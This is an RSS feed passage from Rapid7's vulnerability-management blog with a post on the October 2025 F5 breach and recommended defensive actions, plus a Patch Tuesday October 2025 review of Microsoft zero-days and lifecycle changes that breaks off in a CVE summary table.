<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Vulnerability Management - Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Thu, 06 Nov 2025 10:49:19 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/tag/vulnerability-management/rss" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[Inside the F5 Breach: What We Know and Recommended Actions]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>On October 15, 2025, F5 Networks </span><a href="https://my.f5.com/manage/s/article/K000154696"><span style='font-size: undefined;'>disclosed</span></a><span style='font-size: undefined;'> a breach attributed to a sophisticated nation-state actor. In an </span><a href="https://www.sec.gov/Archives/edgar/data/1048695/000104869525000149/ffiv-20251015.htm"><span style='font-size: undefined;'>SEC 8-K form</span></a><span style='font-size: undefined;'> also filed that same day, F5 confirmed unauthorized access to its internal development and knowledge-management systems dating back to August 9, 2025. Some source-code and vulnerability-related materials were exfiltrated, though F5 states it found no evidence of modified software builds or supply chain compromise. F5 released an </span><a href="https://my.f5.com/manage/s/article/K000154696"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> of the incident. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 has conducted an internal investigation and is not impacted by this incident. As part of our due diligence, we are also monitoring the situation with our third-party vendors.  </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>All known detections have been implemented across the Rapid7 portfolio, and threat hunts across our MDR customer base are being rolled out proactively.  Further details are provided below, and this publication will be updated as new information becomes available. </span></p><h2><span style='color:rgb(67, 67, 67);'>Scope and investigation</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>F5 commissioned independent assessments by </span><a href="https://raw.githubusercontent.com/askf5/K000154696/main/IOActive_Security_Review_2025_Attestation_Letter.pdf"><span style='font-size: undefined;'>IOActive</span></a><span style='font-size: undefined;'> and </span><a href="https://raw.githubusercontent.com/askf5/K000154696/main/NCC_Group_Bedrock_Letter_of_Engagement_Oct_10_2025_1.pdf"><span style='font-size: undefined;'>NCC Group</span></a><span style='font-size: undefined;'>. Both parties confirmed no tampering in build pipelines or release artifacts had occurred.</span></p><h2><span style='color:rgb(67, 67, 67);'>Connection to BRICKSTORM</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Public </span><a href="https://www.bloomberg.com/news/articles/2025-10-16/potentially-catastrophic-breach-of-cyber-firm-blamed-on-china"><span style='font-size: undefined;'>reporting</span></a><span style='font-size: undefined;'> has linked the F5 breach with the BRICKSTORM malware family, based on customer communications from F5. Mandiant’s BRICKSTORM </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span style='font-size: undefined;'>report</span></a><span style='font-size: undefined;'> links the adversary to campaigns targeting software and cloud vendors to harvest source code and credentials for downstream supply-chain exploitation. </span></p><h2><span style='color:rgb(67, 67, 67);'>CISA and NCSC actions</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Following coordinated disclosure, CISA issued </span><a href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices"><span style='font-size: undefined;'>Emergency Directive 26-01</span></a><span style='font-size: undefined;'> instructing federal agencies to audit and patch affected F5 systems, while the </span><a href="https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network"><span style='font-size: undefined;'>UK NCSC</span></a><span style='font-size: undefined;'> confirmed compromise of F5 development infrastructure and is advising UK operators to validate firmware and signatures.</span></p><h2><span style='color:rgb(67, 67, 67);'>Patch cycle and clarification</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>F5 emphasized that its </span><a href="https://my.f5.com/manage/s/article/K000156572"><span style='font-size: undefined;'>October 2025 quarterly patches</span></a><span style='font-size: undefined;'> — released the same day as the SEC filing — are unrelated to the breach, and part of its regular maintenance cadence. However F5 is strongly advising customers to apply the patches, which remediate 44 newly disclosed vulnerabilities, as soon as possible. This is due to the context of the breach, whereby the threat actor was able to learn sensitive information on previously undisclosed vulnerabilities, which may give the attacker a tactical advantage in terms of leveraging these vulnerabilities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 InsightVM and Nexpose customers will have coverage for all the vulnerabilities affecting BIG-IP (all modules), BIG-IP APM, BIG-IP AFM, BIG-IP ASM and BIG-IP PEM in the October 16, 2025 content release.</span></p><h2><span style='color:rgb(67, 67, 67);'>The Rapid7 Labs perspective</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>The Rapid7 Labs research team assesses that, while there is no evidence of active exploitation of undisclosed F5 vulnerabilities, the compromise of internal development systems represents a long-tail risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Adversaries with access to proprietary source code or vulnerability research may attempt to identify latent weaknesses in future operations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 Labs continues to track the BRICKSTORM cluster and any follow-on exploitation of network-edge technologies derived from this intrusion. We will update customers as new intelligence emerges and share it through Intelligence Hub. </span></p><h2><span style='color:rgb(67, 67, 67);'>What you should do now</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations using F5 technologies should take immediate, prioritized action to validate the integrity of their environments and reduce potential exposure stemming from this incident.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>1. Identify and assess your footprint</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Inventory all deployed F5 assets — including hardware appliances, software instances, and virtualized deployments.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Determine whether any of these systems provide remote management access or administrative interfaces that are reachable from the public internet.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>2. Restrict management exposure and validate configurations</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>F5 management interfaces should never be internet-facing. If external exposure is detected, assume potential compromise and conduct a focused assessment of logs, configurations, and credentials.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Implement F5’s published hardening guidance and align configurations with vendor best practices for access control, authentication, and telemetry.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>3. Apply updates and replace unsupported systems</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Immediately install the </span><a href="https://my.f5.com/manage/s/article/K000156572"><span style='font-size: undefined;'>latest F5 security updates</span></a><span style='font-size: undefined;'> released in October 2025.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Retire or replace any F5 products that have reached end-of-support, as these devices will not receive future security fixes.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>4. Enhance monitoring and detection coverage</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Conduct continuous monitoring and proactive threat hunting for anomalous activity related to management logins, credential use, and system modifications.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>5. Report and coordinate if compromise is suspected</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>If indicators of compromise or unauthorized access are detected, </span><a href="https://www.f5.com/support/security-incident-response-team-sirt"><span style='font-size: undefined;'>contact</span></a><span style='font-size: undefined;'> F5’s Security Incident Response Team (SIRT) for coordinated remediation.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Engage your national cybersecurity authority or incident response partner where applicable.</span></p></li></ul><h2><span style='color:rgb(67, 67, 67);'>How Rapid7 is supporting customers</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>At present there are no known exploited CVEs associated with the disclosure. Rapid7 has implemented honeypot sensors to detect if exploitation of affected F5 products does begin. In addition, we are undertaking the following measures for our customers.</span></p><h3><span style='color:rgb(102, 102, 102);'>Vulnerability management</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Vulnerability Management (InsightVM and Nexpose) customers that run F5 BIG-IP models will be able to assess exposure to the vulnerabilities affecting BIG-IP (all modules), BIG-IP APM, BIG-IP AFM, BIG-IP ASM and BIG-IP PEM, with vulnerability checks available in the October 16 content release.</span></p><h3><span style='color:rgb(102, 102, 102);'>MDR and IDR customers</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 has proactively updated our threat detection capabilities in response to this threat. Our Threat Intelligence and MDR teams have launched targeted hunts for IOCs related to BRICKSTORM and are continuously refining our detection rules to identify these attacks early.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Process - BRICKSTORM targets U.S. Tech and Legal sectors with Stealthy Espionage</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Network Connection - BRICKSTORM targets U.S. Tech and Legal sectors with Stealthy Espionage</span></p></li></ul><p style="direction: ltr;">The Rapid7 MDR team has completed all threat hunts utilizing the available indicators of compromise (IOCs) and did not find any indications of customer exposure. Threat hunting will continue in an effort to identify new activity.</p><h3><span style='color:rgb(102, 102, 102);'>Intelligence Hub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding the F5 breach and associated indicators.</span></p><h2>Updates</h2><ul><li><span style='font-size: undefined;'><strong>Oct 17, 20925:</strong></span><span style='font-size: undefined;'> Updated the Vulnerability management section to confirm that VM checks were successfully shipped on Oct 16.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/ve-inside-the-f5-breach-what-we-know-and-recommended-actions</link>
      <guid isPermaLink="false">blt7a5f189dd73e493f</guid>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Emerging Threats]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 16 Oct 2025 17:53:18 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - October 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is publishing 172 new vulnerabilities today. Microsoft is aware of public disclosure for just two of the vulnerabilities published today, and claims no evidence of in-the-wild exploitation. Today sees six zero-day vulnerabilities patched, but only a single one is evaluated as critical severity. Microsoft is aware of public disclosure in three cases, and exploitation in the wild in the remaining three. Today’s release includes the publication of five further critical remote code execution (RCE) vulnerabilities, although Microsoft expects that only one is likely to see exploitation. 14 browser vulnerabilities and a significant array of fixes for Azure Linux (aka Mariner) have already been published separately this month, and are not included in the total. Alongside older versions of Exchange and Office, the behemoth that is Windows 10 receives its final security patches today, although there are some exceptions.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>TPM 2.0: zero-day information disclosure</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>When the Trusted Computing Group (TCG) consortium’s TPM 2.0 reference implementation contains a flaw, under normal circumstances that flaw is likely to be replicated in the downstream implementation by each manufacturer. That is the case with </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-2884"><span style='font-size: undefined;'>CVE-2025-2884</span></a><span style='font-size: undefined;'>, an information disclosure vulnerability which Microsoft is treating as a zero day despite the curious circumstance that Microsoft is a founder member of TCG, and thus presumably privy to the discovery before its publication. Windows 11 and newer versions of Windows Server receive patches. In place of patches, admins for older Windows products such as Windows 10 and Server 2019 receive another implicit reminder that Microsoft would strongly prefer that everyone upgrade.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Remote Access Connection Manager: zero-day EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Local elevation of privilege (EoP) is always attractive to an attacker, since even if it doesn’t get them where they need to be, it can provide an important link in the chain. Microsoft is already aware of exploitation in the wild for </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59230"><span style='font-size: undefined;'>CVE-2025-59230</span></a><span style='font-size: undefined;'>, a vulnerability in the Windows Remote Access Connection Manager. With no user interaction required, this will go straight into an attacker’s standard toolkit. There’s very little information in the advisory itself, but someone out there knows exactly how to exploit this vulnerability. Credit where credit is due: Microsoft detected the exploitation, and now we have patches for all supported versions of Windows.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Agere fax modem driver: pair of zero-day EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Are you a doctor, a lawyer, or a hipster? If so, you might be one of the holdouts who still feels the need to connect a fax machine to a computer, and you should brace yourself for some bad news, then some good news, and then some more bad news. For starters, Microsoft has published two zero-day vulnerabilities in the Agere Modem driver: </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24052"><span style='font-size: undefined;'>CVE-2025-24052</span></a><span style='font-size: undefined;'>, which is publicly disclosed, and </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24990"><span style='font-size: undefined;'>CVE-2025-24990</span></a><span style='font-size: undefined;'>, which has already been exploited in the wild. The vulnerable driver ships with every version of Windows, up to and including Server 2025. Maybe your fax modem uses a different chipset, and so you don’t need the Agere driver? Perhaps you’ve simply discovered email? Tough luck. Your PC is still vulnerable, and a local attacker with a minimally privileged account can elevate to administrator. The good news is that Microsoft is patching both of these vulnerabilities today. The sting in the tail is that they’re fixing the glitch by removing the vulnerable driver altogether, so if you are still using a fax modem with an Agere chipset, no fax for you!</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>IGEL OS: UEFI zero-day</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>If you don’t run thin clients targeting Windows environments, you might be unaware of the existence of IGEL OS, but today’s publication of the advisory for </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47827"><span style='font-size: undefined;'>CVE-2025-47827</span></a><span style='font-size: undefined;'> — which is a zero-day vulnerability — may put it on the radar a little more widely. Successful exploitation abuses overly lax cryptographic verification of root filesystem, and allows bypass of Secure Boot. Microsoft is aware of exploitation in the wild, and is offering patches for the usual array of Windows products.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The advisory doesn’t explain what the Windows patches are protecting against when the flaw is in IGEL OS itself. However, the </span><a href="https://github.com/Zedeldi/CVE-2025-47827?tab=readme-ov-file#description"><span style='font-size: undefined;'>write-up by the original discoverer</span></a><span style='font-size: undefined;'> contains a significant amount of interesting backstory, and we can infer that the Windows patches will include additions to the UEFI revocation list, theoretically rendering a specific asset immune to this attack.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>AMD: zero-day information disclosure</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Every so often, a processor vulnerability gets some attention. When they are included in a set of Patch Tuesday vulns, processor vulnerabilities tend to march to the beat of their own drummer, since Microsoft likely has very little control over how or when these are announced. AMD published </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-0033"><span style='font-size: undefined;'>CVE-2025-0033</span></a><span style='font-size: undefined;'> yesterday, and Microsoft has responded with their own advisory today. The flaw affects only fairly recent AMD EPYC processors, which are more likely to be found in a cloud data centre than they are in a metal box underneath your desk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This is technically a zero-day vulnerability, since Microsoft is acknowledging that at least some products are affected, and there’s no patch yet. Specifically, Microsoft acknowledges that patches are needed for several variants of Azure Confidential Compute VM, and that they are working towards providing those patches. There isn’t anything much to do here yet from a Windows administration perspective, since AMD’s advisory understandably addresses only the underlying hardware, and Microsoft hasn’t said anything yet about any possible impact on Windows itself.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows Server Update Service: critical pre-auth RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The Windows Server Update Service (WSUS) provides admins with some very handy features. You can download updates from Microsoft once, and then redistribute them locally. It also allows scheduling of deployments to minimize impact on business activities, as well as centralized monitoring of updates. What’s not to love, right? Answer: </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59287"><span style='font-size: undefined;'>CVE-2025-59287</span></a><span style='font-size: undefined;'>, a critical RCE which allows an attacker to execute code remotely. Although Microsoft isn’t currently claiming knowledge of disclosure or exploitation in the wild, they do consider exploitation more likely. Although the advisory doesn’t explicitly mark this one out as a pre-authentication RCE, the CVSS v3 base score of 9.8 tells an alarming story: a network attack vector, no privileges required, and low attack complexity. Patches are available for all versions of Windows Server. Taking all that into account, along with the Acknowledgements section of the advisory, a good time to apply these patches is right meow.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Today marks the end of an era, sort of. As Rapid7 has </span><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-september-2025/"><span style='font-size: undefined;'>previously noted</span></a><span style='font-size: undefined;'>, today marks the </span><a href="https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281"><span style='font-size: undefined;'>end of support for non-LTSC versions of Windows 10</span></a><span style='font-size: undefined;'>. Of course, there’s a lot of nuance here. First, let’s address </span><a href="https://learn.microsoft.com/en-us/windows/whats-new/ltsc/overview"><span style='font-size: undefined;'>Windows 10 Long Term Support Channel (LTSC)</span></a><span style='font-size: undefined;'> installations, which are Microsoft’s way of providing risk-averse enterprise customers with the same exact OS almost indefinitely. An LTSC installation never has to worry about huge feature updates, but instead receives only security patches.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>All versions of Windows 10 LTSC will continue to receive security updates for quite some time, with the exception of Windows 10 Enterprise LTSC 2015, which is now too old even for Microsoft to support. Still, that’s been an extra eight-and-a-half years of security updates vs. the equivalent non-LTSC version of Windows 10. When you’re relying on Windows 10 for the safe operation of an MRI scanner or a critical industrial control system at a steel plant, stability is key. A frank discussion of whether or not Windows is the optimal choice in these scenarios is beyond the scope of this analysis. Regular LTSC runs until 2027, whereas IoT Enterprise LTSC 2021 is scheduled to limp onwards all the way until January 2032.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It’s likely that Microsoft’s Extended Security Update (ESU) offering will be much more widely discussed in the coming weeks than is typical. Via the ESU program, Microsoft offers further security updates for software which has moved past the end of support. It is generally a paid “cash for updates” service, although consumers in the European Union can take advantage of Microsoft’s offer of one free year of ESU for Windows 10 Home or Professional. It may well be a coincidence that Microsoft has extended this generous offer only to consumers in a large jurisdiction with strong consumer rights. Users without spare cash or an EU home address can consider syncing their PC settings to OneDrive — make sure to enable multi-factor authentication on your Microsoft account if you do this — or spending 1000 Microsoft Rewards points, if you know what those are and have some to spare.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft, of course, has been pushing us all to upgrade to Windows 11 for a long time, but this leaves some people out in the cold. Windows 10 users without the cash to upgrade to Windows 11-compatible PC hardware or the IT situational awareness to realize that they are now at increased risk of compromise will now drift further and further away from a solid security stance. Not for the first time, the most vulnerable users with the fewest resources will end up in the most precarious situation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Also receiving their final guaranteed patches today: </span><a href="https://support.microsoft.com/en-us/office/end-of-support-for-office-2016-and-office-2019-818c68bc-d5e5-47e5-b52f-ddf636cf8e16"><span style='font-size: undefined;'>Office 2016 and Office 2019</span></a><span style='font-size: undefined;'>. Another significant change: both </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/exchange-server-2016"><span style='font-size: undefined;'>Exchange 2016</span></a><span style='font-size: undefined;'> and </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/exchange-server-2019"><span style='font-size: undefined;'>Exchange 2019</span></a><span style='font-size: undefined;'> are now entirely replaced by Exchange Server Subscription Edition. A huge amount of lifecycle change today, and one which Microsoft has been building towards for many years now. The full impact may not become clear for a while, especially the retirement of Windows 10.</span></p><h2>Summary charts</h2><h2></h2><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2ca005f085205072/68eec3ea8f8c1e67409976e1/2025-10-vuln_count_component.png" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Oct" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Oct" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2ca005f085205072/68eec3ea8f8c1e67409976e1/2025-10-vuln_count_component.png" data-sys-asset-uid="blt2ca005f085205072" data-sys-asset-filename="2025-10-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Oct" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbb16023fb56d4b66/68eec3eabf9ee90885904bbb/2025-10-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Oct" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Oct" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbb16023fb56d4b66/68eec3eabf9ee90885904bbb/2025-10-vuln_count_impact.png" data-sys-asset-uid="bltbb16023fb56d4b66" data-sys-asset-filename="2025-10-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Oct" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda047a3a85807577/68eec3ea7340059e30f77cac/2025-10-vuln_count_impact-component-heatmap.png" alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Oct" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Oct" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda047a3a85807577/68eec3ea7340059e30f77cac/2025-10-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="bltda047a3a85807577" data-sys-asset-filename="2025-10-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Oct" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><h2 style="direction: ltr;">Summary tables</h2><h3 style="direction: ltr;"><strong>Apps vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:13.461538461538462%"/><col style="width:39.743589743589745%"/><col style="width:13.782051282051283%"/><col style="width:16.98717948717949%"/><col style="width:16.025641025641026%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59489"><span style='font-size: undefined;'>CVE-2025-59489</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MITRE: CVE-2025-59489 Unity Gaming Engine Editor vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59281"><span style='font-size: undefined;'>CVE-2025-59281</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Xbox Gaming Services Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59252"><span style='font-size: undefined;'>CVE-2025-59252</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>M365 Copilot Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59272"><span style='font-size: undefined;'>CVE-2025-59272</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Copilot Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59286"><span style='font-size: undefined;'>CVE-2025-59286</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Copilot Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Azure vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:12.5%"/><col style="width:42.46794871794872%"/><col style="width:13.782051282051283%"/><col style="width:16.185897435897438%"/><col style="width:15.064102564102564%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59246"><span style='font-size: undefined;'>CVE-2025-59246</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Entra ID Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59218"><span style='font-size: undefined;'>CVE-2025-59218</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Entra ID Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59247"><span style='font-size: undefined;'>CVE-2025-59247</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure PlayFab Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59271"><span style='font-size: undefined;'>CVE-2025-59271</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Redis Enterprise Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55321"><span style='font-size: undefined;'>CVE-2025-55321</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Monitor Log Analytics Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: 